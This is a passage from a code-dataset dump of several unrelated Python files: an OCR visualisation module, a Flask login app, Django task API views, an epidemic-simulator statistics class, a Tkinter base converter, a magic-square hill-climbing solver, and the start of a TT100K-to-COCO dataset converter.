instances\n if isinstance(probs, torch.autograd.Variable):\n probs = probs.data[:,batch_id,:]\n else:\n probs = probs[:,batch_id,:]\n\n # Copy to CPU if needed\n if isinstance(probs, torch.cuda.FloatTensor):\n probs = probs.cpu()\n\n # Squeeze away unused dimension\n probs.squeeze_()\n\n # Now let's cycle through frames and check for low confidence regions\n low_confidence_spans = []\n topk = 5\n for t in range(probs.size(0)):\n topk_vals, topk_idxs = torch.topk(probs[t], topk)\n if topk_vals[0] < conf_thresh:\n options = []\n for i in range(topk):\n char = _form_display_char(topk_idxs[i], alphabet)\n options.append( (char, topk_vals[i], topk_idxs[i] ) )\n tot_conf = 0\n for _, prob, _ in options:\n tot_conf += prob\n\n if tot_conf >= conf_thresh:\n break\n\n low_confidence_spans.append( (t, t, options) )\n\n\n return low_confidence_spans\n\ndef _decode_with_alignment_spans(model_output, alphabet, batch_id=None):\n min_prob_thresh = 3* 1/len(alphabet)\n\n if batch_id is None:\n batch_id = 0\n # Handle torch Variable instances\n if isinstance(model_output, torch.autograd.Variable):\n probs = model_output.data[:,batch_id,:]\n else:\n probs = model_output[:,batch_id,:]\n\n # Copy to CPU if needed\n if isinstance(probs, torch.cuda.FloatTensor):\n probs = probs.cpu()\n\n # Now time to decode\n argmaxs, argmax_idxs = probs.max(dim=1)\n argmax_idxs.squeeze_()\n argmaxs.squeeze_()\n prev_max = None\n span_start = 0\n\n alignment_tuples = []\n for t in range(probs.size(0)):\n cur_max_prob = argmaxs[t]\n cur_max = argmax_idxs[t]\n\n # Heuristic\n # If model is predicting very low probability for all letters in alphabet, treat that the\n # samed as a CTC blank\n if cur_max_prob < min_prob_thresh:\n cur_max = 0\n\n if prev_max is None:\n prev_max = cur_max\n continue\n if prev_max != cur_max:\n char = _form_display_char(prev_max, alphabet)\n alignment_tuples.append( (span_start, t, char, prev_max) )\n span_start = t+1\n prev_max = cur_max\n\n # Handle last leftover if 
nescesary\n if span_start != probs.size(0):\n char = _form_display_char(prev_max, alphabet)\n alignment_tuples.append( (span_start, probs.size(0)-1, char, prev_max) )\n\n return alignment_tuples\n\n\n\ndef display_target(target, alphabet):\n string_utf8 = \"\"\n string_uxxxx = \"\"\n for char_idx in target:\n string_uxxxx += alphabet[char_idx] + ' '\n string_utf8 += chr(int(alphabet[char_idx][1:], 16))\n\n print(\"Target utf8 string is [%s]\" % string_utf8)\n\n # For Arabic, it is sometimes helpful to dipslay the uxxxx output\n# if not alphabet.left_to_right:\n# print(\"Target uxxxx string is: \\n\\t%s\" % string_uxxxx)\n\ndef display_image(model_input, batch_id=None):\n img, cmap = _setup_image(model_input, batch_id)\n\n # Need to determine appropriate figure size\n # For now, hardcoded to 12 inches wide seems to work okay\n w = 12\n h = math.ceil(img.shape[0] * w / img.shape[1])\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n\n # Finally, show image\n ax.set_yticks([])\n ax.set_xticks([])\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n\n\ndef overlay_hidden_activations(model_input, hidden, scale_factor=(1.0/0.49), batch_id=None):\n # Setup input image\n img, cmap = _setup_image(model_input, batch_id)\n\n # Need to determine appropriate figure size\n # For now, hardcoded to 12 inches wide seems to work okay\n w = 12\n h = math.ceil(img.shape[0] * w / img.shape[1])\n\n # (1) Setup raw plot of hidden activations overlayed on image\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n\n # Now simply plot hidden activations in image\n if isinstance(hidden, torch.autograd.Variable) or isinstance(hidden, torch.FloatTensor):\n hidden = hidden.cpu().numpy()\n\n ax2 = ax.twinx()\n hidden_xs = range(hidden.shape[0])\n hidden_xs = [x*scale_factor for x in hidden_xs]\n ax2.plot(hidden_xs, hidden)\n ax2.set_ylim(-1,1)\n ax2.set_yticks([])\n ax2.set_xticks([])\n\n # Finally, show image\n ax.set_yticks([])\n ax.set_xticks([])\n\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n\n # (2) Setup color-coded background overlay\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n\n # Correct for interpolation due to scaling\n # Basic idea is to split the difference: half of 'gap' goes to left-side, half of 'gap' goes to right side\n left_correction = math.floor(scale_factor/2)\n right_correction = math.floor(scale_factor/2)\n for t in range(hidden.shape[0]):\n left_x = scale_factor*t - left_correction\n right_x = scale_factor*(t+1) + right_correction\n \n #seismic or bwr\n ax.axvspan(left_x, right_x, color=plt.cm.seismic( (hidden[t]+1)/2 ), alpha=0.5)\n\n\n ax.set_yticks([])\n ax.set_xticks([])\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n\n\n\ndef overlay_alignment(model_input, model_output, alphabet, scale_factor=(1.0/0.49), batch_id=None):\n # Setup input image\n img, cmap = _setup_image(model_input, batch_id)\n\n # Need to determine appropriate figure size\n # For now, hardcoded to 12 inches wide seems to work okay\n w = 12\n h = math.ceil(img.shape[0] * w / img.shape[1])\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 
2*margin, 1 - 2*margin])\n\n # Now handle argmax decoding\n alignment_tuples = _decode_with_alignment_spans(model_output, alphabet, batch_id)\n\n # Now color-code spans\n for span_start, span_end, span_char, span_char_id in alignment_tuples: \n letter_color = _tableau20[span_char_id % len(_tableau20)]\n\n # Correct for interpolation due to scaling\n # Basic idea is to split the difference: half of 'gap' goes to left-side, half of 'gap' goes to right side\n left_correction = math.floor(scale_factor/2)\n right_correction = math.floor(scale_factor/2)\n\n left_x = scale_factor*span_start - left_correction\n right_x = scale_factor*span_end + right_correction\n\n ax.axvspan(left_x, right_x, color=letter_color, alpha=0.5)\n\n # Place label for span in center of span\n # Also prepare line segment to point to span\n label_x = (left_x + right_x)/2\n label_y = -10\n rotation = 0\n label_x_correction = 0\n if span_char == \"[SP]\":\n rotation = 90\n label_x_correction = -2\n label_y = -20\n\n ax.annotate(span_char, (label_x,0), (label_x + label_x_correction, label_y), arrowprops={'arrowstyle': '->'}, xycoords='data', textcoords='data', rotation=rotation)\n\n # Finally, show image\n ax.set_yticks([])\n ax.set_xticks([])\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n\n\ndef display_low_confidence_regions(model_input, model_output, alphabet, scale_factor=(1.0/0.49), conf_thresh=0.99, batch_id=None):\n # Setup input image\n img, cmap = _setup_image(model_input, batch_id)\n\n # Need to determine appropriate figure size\n # For now, hardcoded to 12 inches wide seems to work okay\n w = 12\n h = math.ceil(img.shape[0] * w / img.shape[1])\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n ax.set_yticks([])\n ax.set_xticks([])\n\n # Now handle argmax decoding\n spans = _find_low_confidence_spans(model_output, alphabet, conf_thresh, batch_id)\n\n low_conf_area = 0\n low_conf_area_v2 = 0\n\n # Use these to remember the number of characters we showed previuosly, to properly position current labels\n # Even-numbered spans are above the image and odd-numbered spans are below, so keep track of both seperately\n prev_len_even = 2\n prev_len_odd = 2\n\n # Now color-code spans\n for span_idx, (span_start, span_end, char_array) in enumerate(spans): \n low_conf_area += (span_end - span_start + 1)\n\n # Want to count perent of area where confusion is between more than one character in the model,\n # Not just between CTC-Blank and a character in the model\n if len(char_array) > 2 or (len(char_array) == 2 and (char_array[0][2] != 0 and char_array[1][2] != 0)):\n low_conf_area_v2 += (span_end - span_start + 1)\n\n span_color = _tableau20[random.randint(0, len(_tableau20)-1)]\n\n # Correct for interpolation due to scaling\n # Basic idea is to split the difference: half of 'gap' goes to left-side, half of 'gap' goes to right side\n left_correction = math.floor(scale_factor/2)\n right_correction = math.floor(scale_factor/2)\n\n left_x = scale_factor*span_start - left_correction\n right_x = scale_factor*span_end + right_correction\n\n ax.axvspan(left_x, right_x, color=span_color, alpha=0.5)\n\n # Place label for span in center of span\n # Also prepare line segment to point to span\n label_x = (left_x + right_x)/2\n label_x_correction = -8\n\n delta = 10\n if span_idx % 2 == 0:\n delta_y = -delta\n arrow_y = 5\n\n if span_idx % 4 == 0:\n label_y = -delta\n else:\n label_y = -delta + prev_len_even * 
delta_y \n\n\n prev_len_even = len(char_array)\n else:\n delta_y = delta\n arrow_y = img.shape[0] - delta\n\n if span_idx % 4 == 1:\n label_y = img.shape[0] + delta\n else:\n label_y = delta + prev_len_odd * delta_y + img.shape[0]\n\n prev_len_odd = len(char_array)\n char_array = list(reversed(char_array))\n\n for i, (char, prob, char_idx) in enumerate(char_array):\n if i == len(char_array)-1:\n ax.annotate(\"%s (%d)\" % (char,int(100*prob)), (label_x,arrow_y), (label_x + label_x_correction, (label_y + delta_y*(len(char_array)-i-1))), arrowprops={'arrowstyle': '->', 'alpha': 0.2}, xycoords='data', textcoords='data', color=span_color)\n else:\n ax.text(label_x + label_x_correction, (label_y + delta_y*(len(char_array)-i-1)), \"%s (%d)\" % (char,int(100*prob)), color=span_color)\n\n\n\n # Finally, show image\n print(\"Percentage of frames having confidence < %.2f is %.2f%%. Shown below:\" % (conf_thresh, 100*low_conf_area/model_output.size(0)))\n print(\"Percentage of frames having confidence < %.2f with confusion b/w more than CTC blank is %.2f%%. Shown below:\" % (conf_thresh, 100*low_conf_area_v2/model_output.size(0)))\n ax.set_yticks([])\n ax.set_xticks([])\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n","repo_name":"isi-vista/VistaOCR","sub_path":"src/utils/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":13794,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"16"} +{"seq_id":"10470704141","text":"from flask import Flask, jsonify, request, make_response, render_template\nfrom flask import render_template, redirect, url_for, flash\nfrom flask_login import UserMixin, LoginManager\nfrom flask_login import login_user, login_required, current_user, logout_user\nfrom flask_login import login_required, current_user # After login - Profile\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_socketio import SocketIO, send, emit\nfrom flask_cors import CORS\n\n\nfrom werkzeug.security import generate_password_hash, check_password_hash\n\nfrom datetime import datetime\n\napp = Flask(__name__)\nCORS(app)\napp.config['SECRET_KEY'] = 'secret-key-goes-here'\nsocketio = SocketIO(app)\n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///AirCADia_Nebos.db'\ndb = SQLAlchemy(app)\n\nlogin_manager = LoginManager()\nlogin_manager.login_view = 'login'\nlogin_manager.init_app(app)\n\n@login_manager.user_loader\ndef load_user(user_id):\n # since the user_id is just the primary key of our user table, use it in the query for the user\n return User.query.get(int(user_id))\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/aircadia_nebos')\n@login_required\ndef aircadia_nebos():\n return render_template('AircadiaNebos/AirCADiaNebos.html')\n\n@app.route('/profile')\n@login_required\ndef profile():\n return render_template('profile.html', name=current_user.name)\n\n\n@app.route('/aircadia')\ndef aaa():\n return \"Hello, AirCADia!\"\n\n\n@app.route('/signup')\ndef signup():\n return render_template('signup.html')\n\n@app.route('/signup', methods=['POST'])\ndef signup_post():\n # code to validate and add user to database goes here\n email = request.form.get('email')\n username = request.form.get('email')\n name = request.form.get('name')\n password = request.form.get('password')\n\n user = User.query.filter_by(email=email).first() # if this returns a user, then the email already exists in database\n\n if user: # if a user is found, we want to 
redirect back to signup page so user can try again\n flash('Email address already exists')\n return redirect(url_for('signup'))\n\n # create a new user with the form data. Hash the password so the plaintext version isn't saved.\n new_user = User(name=name, email=email, username=username, password=generate_password_hash(password, method='sha256'))\n\n # add the new user to the database\n db.session.add(new_user)\n db.session.commit()\n return redirect(url_for('login'))\n\n\n@app.route('/login')\ndef login():\n return render_template('login.html')\n\n@app.route('/login', methods=['POST'])\ndef login_post():\n # login code goes here\n email = request.form.get('email')\n password = request.form.get('password')\n remember = True if request.form.get('remember') else False\n\n user = User.query.filter_by(email=email).first()\n\n # check if the user actually exists\n # take the user-supplied password, hash it, and compare it to the hashed password in the database\n if not user or not check_password_hash(user.password, password):\n flash('Please check your login details and try again.')\n return redirect(url_for('login')) # if the user doesn't exist or password is wrong, reload the page\n\n # if the above check passes, then we know the user has the right credentials\n login_user(user, remember=remember)\n return redirect(url_for('profile'))\n\n\n\n\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return 'Logout'\n\n\n\n\n\n@app.route('/get-projects', methods=[\"GET\"])\ndef get_projects():\n projectsJson = []\n # projects\n projects = Project.query.all()\n for project in projects:\n projectJson = {\n \"name\": project.name,\n \"end_point\": project.end_point\n }\n projectsJson.append(projectJson)\n res = make_response(jsonify(projectsJson), 200)\n return res\n\n\n# Table for storing users\nclass User(UserMixin, db.Model):\n __tablename__ = 'Users'\n id = db.Column(\"ID\", db.Integer, primary_key = True)\n name = db.Column(\"Name\", db.String(50))\n email = db.Column(\"Email\", db.String(50), unique=True)\n #location = db.Column(db.String(50))\n #date_created = db.Column(db.DateTime, dafault = datetime.now)\n username = db.Column(\"Username\", db.String(50), unique=True)\n password = db.Column(\"Password\", db.String(50))\n projects = db.relationship(\"Project\", secondary=\"UsersProjects\")\n\n \n\n\n\n# Table for storing projects\nclass Project(db.Model):\n __tablename__ = 'Projects'\n id = db.Column(\"ID\", db.Integer, primary_key = True)\n name = db.Column(\"Name\", db.String(50))\n end_point = db.Column(\"EndPoint\", db.String(50))\n #value = db.Column(db.String(50))\n #date_created = db.Column(db.DateTime, dafault = datetime.now)\n\n\n# Table for storing users-projects\nclass UserProject(db.Model):\n __tablename__ = 'UsersProjects'\n id = db.Column(\"ID\", db.Integer, primary_key=True)\n user_id = db.Column(\"UserID\", db.Integer, db.ForeignKey('Users.ID'))\n project_id = db.Column(\"ProjectID\", db.Integer, db.ForeignKey('Projects.ID'))\n user = db.relationship(User, backref=db.backref(\"UsersProjects\", cascade=\"all, delete-orphan\"))\n project = db.relationship(Project, backref=db.backref(\"UsersProjects\", cascade=\"all, delete-orphan\"))\n\n\n\n\n\n\n#Events\n@socketio.on('message')\ndef handle_message(msg):\n print('get message:'+ msg)\n send(msg, broadcast=True)\n\n\n@socketio.on('create_data')\ndef handle_create_data(json):\n print('received json: ' + str(json))\n emit('create_data', json, broadcast=True)\n\n@socketio.on('create_model')\ndef handle_create_model(json):\n 
print('received json: ' + str(json))\n emit('create_model', json, broadcast=True)\n\n\n@socketio.on('create_workflow')\ndef handle_create_workflow(json):\n print('received json: ' + str(json))\n emit('create_workflow', json, broadcast=True)\n\n\n\nif __name__ == '__main__':\n socketio.run(app, debug=True, port=3001)","repo_name":"Atif-Aerospace/AirCADiaNebosDatabase","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"395190592","text":"from rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .models import Task\nfrom .serializers import TaskSerializer\nfrom django.shortcuts import get_object_or_404\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_task_list(request):\n tasks = Task.objects.filter(owner=request.user)\n serializer = TaskSerializer(tasks, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_task_detail(request, id):\n task = get_object_or_404(Task, id=id, owner=request.user)\n serializer = TaskSerializer(task)\n return Response(serializer.data)\n\n@api_view(['POST'])\n# @permission_classes([IsAuthenticated])\ndef create_task(request):\n serializer = TaskSerializer(data=request.data)\n if serializer.is_valid():\n serializer.validated_data['owner'] = request.user\n serializer.validated_data['completed'] = False\n serializer.save()\n return Response(serializer.data, status=201)\n return Response(serializer.errors, status=400)\n\n@api_view(['PATCH'])\n@permission_classes([IsAuthenticated])\ndef edit_task(request, id):\n task = get_object_or_404(Task, id=id, owner=request.user)\n serializer = TaskSerializer(task, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=400)\n\n@api_view(['DELETE'])\n@permission_classes([IsAuthenticated])\ndef delete_task(request, id):\n task = get_object_or_404(Task, id=id, owner=request.user)\n task.delete()\n return Response(status=204)\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef execute_task(request, id):\n task = get_object_or_404(Task, id=id, owner=request.user)\n task.completed = True\n task.save()\n return Response({\"message\": \"Task marked as completed\"})\n","repo_name":"adaltair/decodeproject","sub_path":"src/todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13670577312","text":"\"\"\"\n03/08/2020\n\nGroup 4: Majed Almazrouei, Justin Becker, Dylan Conway, Kyle Diodati, Nicholas Fay\n\nThis module is in charge of collecting and producing statistics on the simulation and the data it collected from\nthe contagions influence on the population.\n\"\"\"\n\nimport os\nimport sys\n\nimport lib.city\nimport lib.person\nimport lib.vessel\n\n\nclass statistics:\n\n def __init__(self):\n \"\"\"\n self, None -> None\n This function has the purpose of initializing the statistics module. 
\n This module keeps track of all statistical calculations/displays that the program makes.\n \"\"\"\n self.cities = list() #list of all the cities in the simulation\n self.activevessels = list() # list of flights that are ready to leave\n self.inactivevessels = list() # list of flights not ready to leave\n #number of dead, immune, infected and healthy individuals\n self.dead = 0\n self.immune = 0\n self.inf = 0\n self.healthy = 0\n\n self.Re = 100\n self.totalPop = 0\n\n def add_vessels(self, newVessels):\n \"\"\"\n self, list(new vessels) -> None\n This function adds new vessels to the active planes we can track.\n \"\"\"\n self.activevessels += newVessels\n return\n\n def add_city(self, newcity):\n \"\"\"\n self, city (city object) -> None\n This function adds cities to the statistics cities list.\n \"\"\"\n self.cities.append(newcity)\n # Add to the total population.\n self.totalPop += len(newcity.people)\n return \n\n def curr_contagion_info(self, hour, run_time):\n \"\"\"\n self, int (hour), int (run time) -> None\n This function has a purpose of printing the current information of the contagions impact \n on the population for that specific day: hour. This function is solely used for printing to console\n to visually show the trends in the contagion contamination.\n \"\"\"\n\n #print header day and hour values\n formated_completon_perc = str((hour/run_time) * 100)\n formated_completon_perc = formated_completon_perc[:5]\n print(\"\\033[0;0H\", end=\"\")\n print(\"\\rSimulation Completion at {}%\\n\".format(formated_completon_perc), end=\"\\n\")\n print(\"\\r\\33[1mDay {}\\tHour {}:\".format(int(hour/24), hour), end=\"\\n\")\n #iterate through all the cities and get the total counts for contagion information\n for location in self.cities:\n inf = location.inf_count\n hlth = location.healthy_count\n immu = location.immune_count\n dead = location.dead_count\n #print the information to the console\n print(\"\\r \\033[K\", end=\"\") # Fixes healthy having character duplicates\n print(\"\\r \\33[1m {}\\33[0m:\\t\\t\\33[32m{} Healthy\\33[0m\\t {} Immune\\t\\33[93m{} Infected \\33[0m\\t\\33[31m {} Dead \\33[0m\".format(location.name, hlth, immu, inf, dead), end=\"\\n\")\n \n print(\"\\r\\nEffective Reproduction Number: {}\".format(self.Re), end=\"\\n\")\n\n print(\"\\r\\nPress CTRL^C to exit the simulation early.\")\n return \n \n def get_total_counts(self):\n \"\"\"\n self, None -> None\n This function is responsible for getting the total amount of the given attribute (inf, dead etc) people \n from each city to report statistics.\n \"\"\"\n for city in self.cities: #iterate through all the cities\n self.healthy += city.healthy_count\n self.dead += city.dead_count\n self.immune += city.immune_count\n self.inf += city.inf_count\n \n # Get counts for people still in flight when the program finishes.\n for flight in self.activevessels:\n for person in flight.people:\n if person.immune:\n self.immune += 1\n elif person.dead:\n self.dead += 1\n elif person.infected:\n self.inf += 1\n else:\n self.healthy += 1\n return\n\n def get_percentage(self, count, init_population):\n \"\"\"\n self, int (count of people), int (healthy person count) -> float\n This function is in charge of calculating the percentage of individuals that \n die, get infected or become immune compared to the overall population.\n \"\"\"\n #try to calculate percentage\n try:\n return ((count/init_population) * 100)\n except ZeroDivisionError:\n #if there is a division by zero error for some reason\n return 0\n\n def 
print_time_series_table(self, days, immune, infected, dead):\n \"\"\"\n self, list, list, list, list -> None\n This function is in charge of printing a table that shows all the time series data\n that has been collected. This will be exececuted at the end of the program.\n \"\"\"\n #dict for labels and rows\n table = [days, infected, immune, dead]\n #list of all header labels\n headers = [\"Days\", \"Infected\", \"Immune\", \"Dead\"]\n for item in headers:\n print(\"\\33[1m{:>10}\\33[0m\".format(item).strip(\"\\n\"), end=\"\")\n print(\"\")\n #iterate through table keys\n i = 0\n while(i<len(days)):\n for row in table:\n #print the necessary item in the index given by i\n print(\"{: >10}\".format(row[i]).strip(\"\\n\"), end=\"\")\n #print a new line for the next day\n print(\"\")\n i += 1\n return\n\n def average_stats(self, days, attribute):\n \"\"\"\n self, int (days), int (attribute) -> float\n This function has a purpose of determining the average number of\n individuals that die, immune or are infected each day. \n \"\"\"\n return attribute/days\n\n def print_stats(self, days, initial_pop):\n \"\"\"\n self, int (days the simulation ran for), int (initial population) -> None\n This function has the sole function of printing all final statistics after\n the execution of the main program.\n \"\"\"\n #get the total counts of infected, dead, immune and healthy individuals\n self.get_total_counts()\n #get the percentage of those dead, immune and infected\n dead_perc = self.get_percentage(self.dead, initial_pop)\n immune_perc = self.get_percentage(self.immune, initial_pop)\n inf_perc = self.get_percentage(self.inf, initial_pop)\n healthy_perc = self.get_percentage(self.healthy, initial_pop)\n average_deaths = self.average_stats(days,self.dead)\n average_infected = self.average_stats(days, self.inf)\n average_immune = self.average_stats(days, self.immune)\n #print the total counts after the amount of time the simulation has run\n print(\"\\n\\nAfter {} days, these are the results of the contagions impact on the population with {} individuals.\".format(days, initial_pop))\n print(\"\\33[1mTotal Counts ---->\\33[0m\\33[32m Healthy: {},\\33[0m\\33[93m Infected: {},\\33[0m \\33[31mDead: {},\\33[0m Immune: {}\".format(self.healthy, self.inf, self.dead, self.immune))\n print(\"Each day on average: \\33[93m{} people are infected\\33[0m, \\33[31m{} die\\33[0m and {} become immune.\".format(average_infected, average_deaths, average_immune))\n #print the total amount of healthy people, dead, infected and immune\n print(\"Out of the {} people in the total population.\".format(initial_pop))\n print(\"{}% are \\33[31mdead.\\33[0m\".format(dead_perc))\n print(\"{}% are immune.\".format(immune_perc))\n print(\"{}% were \\33[93minfected.\\33[0m\".format(inf_perc))\n print(\"{}% are still \\33[32mhealthy.\\33[0m\".format(healthy_perc))\n return\n","repo_name":"kdiodati/Epidemic-Simulator","sub_path":"lib/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":7762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27048950868","text":"\n# Write Python GUI program to accept a decimal number and convert and display it to binary, octal and hexadecimal number.\nfrom tkinter import *\ndef calculate():\n res=int(e1.get())\n label_text.set(bin(res))\n label_text1.set(oct(res))\n label_text2.set(hex(res))\n \nwindow=Tk()\nlabel_text=StringVar()\nlabel_text1=StringVar()\nlabel_text2=StringVar()\nLabel(window,text=\"Enter Decimal Number: 
\").grid(row=0)\n\n\nLabel(window,text=\"Binary: \").grid(row=3)\nresult=Label(window,text=\"\",textvariable=label_text).grid(row=3,column=1)\n\nLabel(window,text=\"Octal\").grid(row=4)\nresult=Label(window,text=\"\",textvariable=label_text1).grid(row=4,column=1)\n\nLabel(window,text=\"Hexadecimal: \").grid(row=5)\nresult=Label(window,text=\"\",textvariable=label_text2).grid(row=5,column=1)\ne1=Entry(window)\ne1.grid(row=0,column=1)\nb=Button(window,text=\"Calculate\",command=calculate)\nb.grid(row=0,column=6,columnspan=2,rowspan=2,padx=5,pady=5)\nmainloop()\n\n","repo_name":"khankabi/TY-BCA_Samir","sub_path":"PRACTICAL SLIPS SOLUTION/Slip 27/python/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10448113425","text":"from itertools import combinations\nfrom random import shuffle\n\nfrom simpleai.search import SearchProblem, hill_climbing\n\nfrom utils import print_grid\n\n\nSQUARE_SIZE = 10\nMAX_NUMBER = SQUARE_SIZE ** 2\n\nTARGET_TOTAL = sum(range(1, MAX_NUMBER+1)) / SQUARE_SIZE\n\n\ndef find(element, state):\n for row_i, row in enumerate(state):\n for column_i, this_element in enumerate(row):\n if element == this_element:\n return row_i, column_i\n\n\nclass MagicSquareProblem(SearchProblem):\n def actions(self, state):\n return list(combinations(range(1, MAX_NUMBER +1), 2))\n\n def result(self, state, action):\n state = [list(row) for row in state]\n number_a, number_b = action\n\n a_row, a_column = find(number_a, state)\n b_row, b_column = find(number_b, state)\n\n state[a_row][a_column] = number_b\n state[b_row][b_column] = number_a\n\n return tuple(tuple(row) for row in state)\n\n def value(self, state):\n totals = []\n for row in state:\n totals.append(sum(row))\n\n for column in zip(*state):\n totals.append(sum(column))\n\n return totals.count(TARGET_TOTAL)\n\n def generate_random_state(self):\n numbers = list(range(1, MAX_NUMBER + 1))\n shuffle(numbers)\n\n state = []\n for row_index in range(SQUARE_SIZE):\n from_index = row_index * SQUARE_SIZE\n to_index = from_index + SQUARE_SIZE\n state.append(tuple(numbers[from_index:to_index]))\n\n return tuple(state)\n\n def print_state(self, state):\n elements = {\n str(element): [(row_i, column_i)]\n for row_i, row in enumerate(state)\n for column_i, element in enumerate(row)\n }\n\n print_grid(SQUARE_SIZE, SQUARE_SIZE, elements)\n\n\nif __name__ == \"__main__\":\n expected_value = SQUARE_SIZE * 2\n iterations = 0\n while True:\n iterations += 1\n random_state = MagicSquareProblem().generate_random_state()\n problem = MagicSquareProblem(random_state)\n result = hill_climbing(problem, 1000)\n if result.value == expected_value:\n print(\"solution found! 
Iterations:\", iterations)\n break\n if iterations % 10 == 0:\n print(f\"{iterations} iterations and the solution hasn't been found yet :(\")\n\n\n problem.print_state(result.state)\n print(\"value:\", problem.value(result.state))\n","repo_name":"sofide/ai-practices","sub_path":"magic_squares.py","file_name":"magic_squares.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12089360442","text":"import os\nimport json\nfrom random import random\nimport cv2\nimport shutil\nimport json\nimport xml.dom.minidom\nfrom tqdm import tqdm\nimport argparse\n\n\n# from jinxSkills.jinx_opencv.datasets_transform.dataset_transform import DataSets_transform\n\n\nclass TT100K2COCO:\n def __init__(self):\n self.original_datasets = 'tt100k'\n self.to_datasets = 'coco'\n\n def class_statistics(self):\n # os.makedirs('annotations', exist_ok=True)\n # 存放数据的父路径\n parent_path = 'E:/dataset/tt100k_2021'\n\n # 读TT100K原始数据集标注文件\n with open(os.path.join(parent_path, 'annotations_all.json')) as origin_json:\n origin_dict = json.load(origin_json)\n classes = origin_dict['types']\n # 建立统计每个类别包含的图片的字典\n sta = {}\n for i in classes:\n sta[i] = []\n\n images_dic = origin_dict['imgs']\n\n # 记录所有保留的图片\n saved_images = []\n # 遍历TT100K的imgs\n for image_id in images_dic:\n image_element = images_dic[image_id]\n image_path = image_element['path']\n\n # 添加图像的信息到dataset中\n image_path = image_path.split('/')[-1]\n obj_list = image_element['objects']\n\n # 遍历每张图片的标注信息\n for anno_dic in obj_list:\n label_key = anno_dic['category']\n # 防止一个图片多次加入一个标签类别\n if image_path not in sta[label_key]:\n sta[label_key].append(image_path)\n\n # 只保留包含图片数超过100的类别(重新划分,阈值100可根据需求修改)\n result = {k: v for k, v in sta.items() if len(v) >= 100}\n\n for i in result:\n print(\"the type of {} includes {} images\".format(i, len(result[i])))\n saved_images.extend(result[i])\n\n saved_images = list(set(saved_images))\n print(\"total types is {}\".format(len(result)))\n\n type_list = list(result.keys())\n result = {\"type\": type_list, \"details\": result, \"images\": saved_images}\n print(type_list)\n # 保存结果\n json_name = os.path.join(parent_path, 'statistics.json')\n with open(json_name, 'w', encoding=\"utf-8\") as f:\n json.dump(result, f, ensure_ascii=False, indent=1)\n\n def original_datasets2object_datasets(self):\n # os.makedirs('dataset/annotations', exist_ok=True)\n # 存放数据的父路径\n parent_path = 'E:/dataset/tt100k_2021/data'\n\n # 读TT100K原始数据集标注文件\n with open(os.path.join(parent_path, 'annotations.json')) as origin_json:\n origin_dict = json.load(origin_json)\n\n with open(os.path.join(parent_path, 'statistics.json')) as select_json:\n select_dict = json.load(select_json)\n classes = select_dict['type']\n\n train_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n val_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n test_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n label = {}\n\n info = {\n \"year\": 2021, # 年份\n \"version\": '1.0', # 版本\n \"description\": \"TT100k_to_coco\", # 数据集描述\n \"contributor\": \"Tecent&Tsinghua\", # 提供者\n \"url\": 'https://cg.cs.tsinghua.edu.cn/traffic-sign/', # 下载地址\n \"date_created\": 2021 - 1 - 15\n }\n licenses = {\n \"id\": 1,\n \"name\": \"null\",\n \"url\": \"null\",\n }\n\n train_dataset['info'] = info\n val_dataset['info'] = info\n test_dataset['info'] = info\n train_dataset['licenses'] = 
